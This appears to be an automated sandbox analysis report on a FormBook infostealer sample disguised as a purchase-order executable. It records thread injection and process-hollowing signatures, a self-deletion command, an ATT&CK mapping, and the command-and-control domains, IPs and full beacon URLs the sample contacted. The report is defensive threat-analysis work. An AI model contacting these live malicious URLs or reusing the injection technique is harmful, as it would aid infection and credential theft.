          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463513A mov eax, dword ptr fs:[00000030h]7_2_0463513A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463513A mov eax, dword ptr fs:[00000030h]7_2_0463513A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04609100 mov eax, dword ptr fs:[00000030h]7_2_04609100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04609100 mov eax, dword ptr fs:[00000030h]7_2_04609100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04609100 mov eax, dword ptr fs:[00000030h]7_2_04609100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046941E8 mov eax, dword ptr fs:[00000030h]7_2_046941E8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0460B1E1 mov eax, dword ptr fs:[00000030h]7_2_0460B1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0460B1E1 mov eax, dword ptr fs:[00000030h]7_2_0460B1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0460B1E1 mov eax, dword ptr fs:[00000030h]7_2_0460B1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046361A0 mov eax, dword ptr fs:[00000030h]7_2_046361A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046361A0 mov eax, dword ptr fs:[00000030h]7_2_046361A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C49A4 mov eax, dword ptr fs:[00000030h]7_2_046C49A4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C49A4 mov eax, dword ptr fs:[00000030h]7_2_046C49A4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C49A4 mov eax, dword ptr fs:[00000030h]7_2_046C49A4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C49A4 mov eax, dword ptr fs:[00000030h]7_2_046C49A4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046869A6 mov eax, dword ptr fs:[00000030h]7_2_046869A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046851BE mov eax, dword ptr fs:[00000030h]7_2_046851BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046851BE mov eax, dword ptr fs:[00000030h]7_2_046851BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046851BE mov eax, dword ptr fs:[00000030h]7_2_046851BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046851BE mov eax, dword ptr fs:[00000030h]7_2_046851BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0462C182 mov eax, dword ptr fs:[00000030h]7_2_0462C182
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463A185 mov eax, dword ptr fs:[00000030h]7_2_0463A185
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04632990 mov eax, dword ptr fs:[00000030h]7_2_04632990
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046BB260 mov eax, dword ptr fs:[00000030h]7_2_046BB260
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046BB260 mov eax, dword ptr fs:[00000030h]7_2_046BB260
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D8A62 mov eax, dword ptr fs:[00000030h]7_2_046D8A62
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0464927A mov eax, dword ptr fs:[00000030h]7_2_0464927A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04609240 mov eax, dword ptr fs:[00000030h]7_2_04609240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04609240 mov eax, dword ptr fs:[00000030h]7_2_04609240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04609240 mov eax, dword ptr fs:[00000030h]7_2_04609240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04609240 mov eax, dword ptr fs:[00000030h]7_2_04609240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046CEA55 mov eax, dword ptr fs:[00000030h]7_2_046CEA55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04694257 mov eax, dword ptr fs:[00000030h]7_2_04694257
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04644A2C mov eax, dword ptr fs:[00000030h]7_2_04644A2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04644A2C mov eax, dword ptr fs:[00000030h]7_2_04644A2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04618A0A mov eax, dword ptr fs:[00000030h]7_2_04618A0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04605210 mov eax, dword ptr fs:[00000030h]7_2_04605210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04605210 mov ecx, dword ptr fs:[00000030h]7_2_04605210
          Source: C:\Users\user\Desktop\PO_29_00412.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.lboclkchain.com
          Source: C:\Windows\explorer.exeDomain query: www.qiqihao.site
          Source: C:\Windows\explorer.exeDomain query: www.rechnung.pro
          Source: C:\Windows\explorer.exeDomain query: www.conegenie.com
          Source: C:\Windows\explorer.exeDomain query: www.missmaltese.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.178.208.160 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.208.69.149 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sueshemp.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.71.232.3 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.werealestatephotography.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.maxim.technology
          Source: C:\Windows\explorer.exeNetwork Connect: 216.239.38.21 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.216.244.232 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.251.84.92 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.onjulitrading.com
          Source: C:\Windows\explorer.exeDomain query: www.agteless.com
          Source: C:\Windows\explorer.exeDomain query: www.thelocallawnmen.com
          Source: C:\Windows\explorer.exeDomain query: www.designtehengsg.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO_29_00412.exeSection loaded: unknown target: C:\Users\user\Desktop\PO_29_00412.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO_29_00412.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO_29_00412.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PO_29_00412.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: E70000Jump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeProcess created: C:\Users\user\Desktop\PO_29_00412.exe 'C:\Users\user\Desktop\PO_29_00412.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_29_00412.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.227001104.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000004.00000000.227277327.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.482496955.0000000002E90000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.240711887.000000000871F000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.482496955.0000000002E90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.227277327.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.482496955.0000000002E90000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.227277327.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.482496955.0000000002E90000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403461

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.480594324.0000000000830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.225535038.0000000003120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261451958.0000000000900000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261351613.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.480879219.0000000000960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO_29_00412.exe.3120000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO_29_00412.exe.3120000.4.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.480594324.0000000000830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.225535038.0000000003120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261451958.0000000000900000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261351613.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.480879219.0000000000960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO_29_00412.exe.3120000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO_29_00412.exe.3120000.4.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionAccess Token Manipulation1Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery231Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection512Access Token Manipulation1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsFile and Directory Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 399774 Sample: PO_29_00412.exe Startdate: 29/04/2021 Architecture: WINDOWS Score: 100 31 www.sofiascelebrations.com 2->31 33 www.awdcompanies.com 2->33 35 2 other IPs or domains 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 7 other signatures 2->49 11 PO_29_00412.exe 19 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\Temp\...\o9oo.dll, PE32 11->29 dropped 59 Detected unpacking (changes PE section rights) 11->59 61 Maps a DLL or memory area into another process 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 15 PO_29_00412.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.onjulitrading.com 154.216.244.232, 49736, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 18->37 39 www.werealestatephotography.com 35.208.69.149, 49729, 80 GOOGLE-2US United States 18->39 41 16 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 rundll32.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO_29_00412.exe36%ReversingLabsWin32.Spyware.Noon
          PO_29_00412.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp\o9oo.dll15%ReversingLabsWin32.Trojan.Wacatac

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.0.PO_29_00412.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.PO_29_00412.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.PO_29_00412.exe.3120000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.PO_29_00412.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.1.PO_29_00412.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.PO_29_00412.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          SourceDetectionScannerLabelLink
          www.werealestatephotography.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.agteless.com/hw6d/?wR9=5qwRj4Cks+XUvhq+/72yLl02AnqHimYvFWLTxgnccFxg28KqBmPa1ezdvIZqmAulhHSP&3f=ZlLd8r8PtX100%Avira URL Cloudmalware
          http://www.rechnung.pro/hw6d/?wR9=Ddm3qJHqgzBdBhAnftzkfa9VwSzTwTX1J1BudaGH8hBPcPYq/VmKmGqlzVIhNMaY+qFM&3f=ZlLd8r8PtX0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.conegenie.com/hw6d/?wR9=NqDP1kNWGB45muwCVyMdlJqLatp7PevtuQ88HQHRMDyTbQkj9J6FuQuiyA3H8+Oo5z8S&3f=ZlLd8r8PtX0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sueshemp.com/hw6d/?wR9=AAdYqRCZdpBCICVD7XT/TJuWXv5e4p9OLjsTJuFeeFMT5Erf7T6eOfQLuJbJMdHcFc0O&3f=ZlLd8r8PtX100%Avira URL Cloudmalware
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          www.werealestatephotography.com/hw6d/0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.sofiascelebrations.com/hw6d/?wR9=dUGVTn/5aJJKliywqMmmpRKN90QgELEtjSlSK2PFHkAeyTnfmB2J+703q8XbnRj4tTIF&3f=ZlLd8r8PtX0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.werealestatephotography.com/hw6d/?wR9=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPaWrxhtzEdX&3f=ZlLd8r8PtX0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.lboclkchain.com/hw6d/?wR9=YjpOOYUDmjvdyafLH2XIreLzwhI/7xCnoo7q/I/3CP849+jnPV3O3CrzxJL1042huvEP&3f=ZlLd8r8PtX100%Avira URL Cloudmalware
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.missmaltese.com/hw6d/?wR9=6RCAxHzHs2U8cKrh6h9/ydGjrhxnSTzcOHDfHkTTDkA8hCV/5sMta/cQsHNALet3pcHc&3f=ZlLd8r8PtX100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.werealestatephotography.com
          		35.208.69.149
          		truetrueunknown
          www.lboclkchain.com
          		185.178.208.160
          		truetrue
            		unknown
            agteless.com
            		34.102.136.180
            		truefalse
              		unknown
              parking.namesilo.com
              		198.251.84.92
              		truefalse
                		high
                sueshemp.com
                		198.71.232.3
                		truetrue
                  		unknown
                  www.onjulitrading.com
                  		154.216.244.232
                  		truetrue
                    		unknown
                    ext-sq.squarespace.com
                    		198.185.159.144
                    		truefalse
                      		high
                      conegenie.com
                      		34.102.136.180
                      		truefalse
                        		unknown
                        awdcompanies.com
                        		34.102.136.180
                        		truefalse
                          		unknown
                          www.thelocallawnmen.com
                          		216.239.38.21
                          		truefalse
                            		unknown
                            sofiascelebrations.com
                            		34.102.136.180
                            		truefalse
                              		unknown
                              www.qiqihao.site
                              		unknown
                              		unknowntrue
                                		unknown
                                www.rechnung.pro
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.conegenie.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.missmaltese.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.sofiascelebrations.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.sueshemp.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.maxim.technology
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.awdcompanies.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.agteless.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.designtehengsg.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.agteless.com/hw6d/?wR9=5qwRj4Cks+XUvhq+/72yLl02AnqHimYvFWLTxgnccFxg28KqBmPa1ezdvIZqmAulhHSP&3f=ZlLd8r8PtXfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.rechnung.pro/hw6d/?wR9=Ddm3qJHqgzBdBhAnftzkfa9VwSzTwTX1J1BudaGH8hBPcPYq/VmKmGqlzVIhNMaY+qFM&3f=ZlLd8r8PtXtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.conegenie.com/hw6d/?wR9=NqDP1kNWGB45muwCVyMdlJqLatp7PevtuQ88HQHRMDyTbQkj9J6FuQuiyA3H8+Oo5z8S&3f=ZlLd8r8PtXfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sueshemp.com/hw6d/?wR9=AAdYqRCZdpBCICVD7XT/TJuWXv5e4p9OLjsTJuFeeFMT5Erf7T6eOfQLuJbJMdHcFc0O&3f=ZlLd8r8PtXtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  www.werealestatephotography.com/hw6d/true
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://www.sofiascelebrations.com/hw6d/?wR9=dUGVTn/5aJJKliywqMmmpRKN90QgELEtjSlSK2PFHkAeyTnfmB2J+703q8XbnRj4tTIF&3f=ZlLd8r8PtXfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.werealestatephotography.com/hw6d/?wR9=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPaWrxhtzEdX&3f=ZlLd8r8PtXtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.lboclkchain.com/hw6d/?wR9=YjpOOYUDmjvdyafLH2XIreLzwhI/7xCnoo7q/I/3CP849+jnPV3O3CrzxJL1042huvEP&3f=ZlLd8r8PtXtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.missmaltese.com/hw6d/?wR9=6RCAxHzHs2U8cKrh6h9/ydGjrhxnSTzcOHDfHkTTDkA8hCV/5sMta/cQsHNALet3pcHc&3f=ZlLd8r8PtXtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comexplorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.tiro.comexplorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://nsis.sf.net/NSIS_ErrorErrorPO_29_00412.exefalse
                                                                		high
                                                                http://www.goodfont.co.krexplorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.carterandcone.comlexplorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.typography.netDexplorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
